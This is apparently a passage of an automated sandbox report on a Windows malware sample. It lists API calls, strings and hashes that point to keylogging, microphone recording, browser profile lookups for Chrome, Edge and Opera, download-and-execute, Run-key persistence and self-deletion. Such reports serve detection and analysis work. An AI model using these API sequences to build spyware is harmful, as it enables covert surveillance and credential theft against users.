                                                                                                • API String ID: 3309952895-93608704
                                                                                                • Opcode ID: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                • Instruction ID: 6255842b65d5da3793f092b3f1447ea5db7efb23f61c0c2d19f8aa6a86066f85
                                                                                                • Opcode Fuzzy Hash: f02f1a0373de4d905e268f57495fa08b349ea431ac4d969b5d726f466b44a1dd
                                                                                                • Instruction Fuzzy Hash: CB119F315143006BC614BB26CC579AF77A8AB90348F40083FF552661E3EF79AE18869B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
• GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
• CloseHandle.KERNEL32(00000000), ref: 0041C576
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
• CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
• API ID: CloseHandleOpenProcess
• String ID:
• API String ID: 39102293-0
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 004398FA
  • Part of subcall function 00439F32: ___AdjustPointer.LIBCMT ref: 00439F7C
• _UnwindNestedFrames.LIBCMT ref: 00439911
• ___FrameUnwindToState.LIBVCRUNTIME ref: 00439923
• CallCatchBlock.LIBVCRUNTIME ref: 00439947
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• String ID:
• API String ID: 2633735394-0
APIs
• GetSystemMetrics.USER32(0000004C), ref: 0041942B
• GetSystemMetrics.USER32(0000004D), ref: 00419431
• GetSystemMetrics.USER32(0000004E), ref: 00419437
• GetSystemMetrics.USER32(0000004F), ref: 0041943D
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-0
APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438FB1
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438FB6
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438FBB
  • Part of subcall function 0043A4BA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A4CB
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438FD0
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• String ID:
• API String ID: 1761009282-0
APIs
• __startOneArgErrorHandling.LIBCMT ref: 00442D3D
Strings
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
APIs
Strings
• API ID: CountEventTick
• String ID: !D@
• API String ID: 180926312-604454484
APIs
• GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C92
Strings
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
APIs
• _wcslen.LIBCMT ref: 00416330
  • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
  • Part of subcall function 004138B2: RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
  • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
  • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
Strings
• API ID: _wcslen$CloseCreateValue
• String ID: !D@$okmode
• API String ID: 3411444782-1942679189
APIs
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
• GetLocalTime.KERNEL32(?,004755A8,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
APIs
• Sleep.KERNEL32 ref: 0041667B
• URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DownloadFileSleep
                                                                                                • String ID: !D@
                                                                                                • API String ID: 1931167962-604454484
                                                                                                • Opcode ID: be6e5f46a91c801139daea62cfee6fea62604350e59be30fcba7917088f11bec
                                                                                                • Instruction ID: 943aba663a6785b3e55a0e29e9dd0f60b42d3502aaa7a5a348319576c1e2766f
                                                                                                • Opcode Fuzzy Hash: be6e5f46a91c801139daea62cfee6fea62604350e59be30fcba7917088f11bec
                                                                                                • Instruction Fuzzy Hash: 9D1142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 567e5faa43255f32a5b30864013efa8f17039a8847ec4d53b4e47bd37c3e1453
                                                                                                • Instruction ID: dc1ef91952a31d7701eba46fb19b130c3a81cf04c31882e55cbcd77cf5b9c3d8
                                                                                                • Opcode Fuzzy Hash: 567e5faa43255f32a5b30864013efa8f17039a8847ec4d53b4e47bd37c3e1453
                                                                                                • Instruction Fuzzy Hash: 72118E714082455AC304EB62D8519BFB3E9AB44308F50093FF88AA21E1EF3CDA45C69E
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: alarm.wav$xYG
                                                                                                • API String ID: 1174141254-3120134784
                                                                                                • Opcode ID: dead4786efec343504c38dbb7bc7a316ff3e165c8f866438eec05cc0de6d3d6a
                                                                                                • Instruction ID: fba4c3df788ebc26406fa6248c5b94d62a9d66ba9cb3dc57f05af0bb44f50ff0
                                                                                                • Opcode Fuzzy Hash: dead4786efec343504c38dbb7bc7a316ff3e165c8f866438eec05cc0de6d3d6a
                                                                                                • Instruction Fuzzy Hash: 78019E7068831166CA04F77688166EE37559B80318F00847FF64A566E2EFBC9A9586CF
                                                                                                APIs
                                                                                                  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                                                                                • UnhookWindowsHookEx.USER32 ref: 0040B102
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 1623830855-1496645233
                                                                                                • Opcode ID: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                                                                                • Opcode Fuzzy Hash: d648d1a5222b06a5ee4967885c863a2486092fd33b051c0742ca5bf23bf5bbb2
                                                                                                • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                                                                                APIs
                                                                                                • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B60,00474EF0,?,00000000,00401A15), ref: 00401849
                                                                                                • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$BufferHeaderPrepare
                                                                                                • String ID: hMG
                                                                                                • API String ID: 2315374483-350922481
                                                                                                • Opcode ID: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                • Instruction ID: 961ac9ec07701b1a047984959549e732b5ed52ade8bfae490fcb5a94ac50a39c
                                                                                                • Opcode Fuzzy Hash: 05842d2320f940dcc6a072c2e7d52a08573503918b4c9d372d2077cc61f75943
                                                                                                • Instruction Fuzzy Hash: 46016D71701301AFC7609F75EC449697BA9FF89355701413AF409C77A2EB759C50CB98
                                                                                                APIs
                                                                                                • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocaleValid
                                                                                                • String ID: IsValidLocaleName$kKD
                                                                                                • API String ID: 1901932003-3269126172
                                                                                                • Opcode ID: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                                                                                • Opcode Fuzzy Hash: e2be842f2307acef5cef967ff3e72c46beaafbec9f28b2cc6d0622aebebc3446
                                                                                                • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                • API String ID: 1174141254-4188645398
                                                                                                • Opcode ID: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                                                                                • Opcode Fuzzy Hash: fff5cbc271dcd2a0c2fcaea843e62c237a5582de80a90fa2dd9971ca022f0490
                                                                                                • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                • API String ID: 1174141254-2800177040
                                                                                                • Opcode ID: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                                                                                • Opcode Fuzzy Hash: 05528f6e26b227e7e6fd6b49a69558ec14147af62c0e348f22da046dfe724b6c
                                                                                                • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                • API String ID: 1174141254-1629609700
                                                                                                • Opcode ID: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                                                                                • Opcode Fuzzy Hash: 8f8d25e03aac0077426d96557f64e84766c5e147873ceb62e84888fad8dfe89f
                                                                                                • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 0040B686
                                                                                                  • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                                                                                  • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                                                                                  • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                                                                                  • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                                                                                  • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475154,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                                                                                  • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 2738857842-2658077756
                                                                                                • Opcode ID: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                                                                                • Opcode Fuzzy Hash: 2bdc01cacd876c0b350abb7d408e8864ecff36be759564c8f89a1257273347cd
                                                                                                • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: !D@$open
                                                                                                • API String ID: 587946157-1586967515
                                                                                                • Opcode ID: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                                                                                • Opcode Fuzzy Hash: 33d0e39c2c5277f948c9383974d65c92f33d2ad08035dd6aa383958bc01fb2b1
                                                                                                • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 0040B6E0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                                                                                • Opcode Fuzzy Hash: 5e9c90a2b5f30f0669b27174b58f532bfe2dc3a0439e10c0f003492ce4cfd8eb
                                                                                                • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                                                                                APIs
                                                                                                  • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
APIs
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752E8,00475300,?,pth_unenc), ref: 00413A6C
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
Strings
• Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
APIs
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
APIs
• TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
• WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
• GetLastError.KERNEL32 ref: 00440D85
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
• SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
• SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC